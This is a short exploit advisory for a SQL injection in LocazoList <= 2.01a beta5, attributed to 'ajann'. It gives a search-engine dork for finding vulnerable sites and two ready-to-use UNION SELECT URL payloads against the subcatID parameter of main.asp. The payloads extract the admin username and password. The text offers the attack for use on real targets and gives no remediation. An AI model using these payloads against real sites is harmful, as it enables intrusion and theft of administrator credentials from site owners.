LocazoList <= 2.01a beta5 (subcatID) Remote SQL Injection Vulnerability

************************************************************************************* # Title   :  LocazoList <= v2.01a beta5 (subcatID) Remote SQL Injection Vulnerability # Author  :  ajann # Contact :  :( # S.Page  :  http://www.locazo.net:81 # Dork    :  "Powered by Locazolist Copyright ? 2006" # $$      :  $100 ************************************************************************************* [[SQL]]]--------------------------------------------------------- http://[target]/[path]//main.asp?catid=1&subcatID=[SQL] Example: //main.asp?catid=1&subcatID=-1%20union%20select%200,username,0,0,0%20from%20admin%20where%20id%20like%201 //main.asp?catid=1&subcatID=-1%20union%20select%200,password,0,0,0%20from%20admin%20where%20id%20like%201 [[/SQL]] """"""""""""""""""""" # ajann,Turkey # ... # Im not Hacker!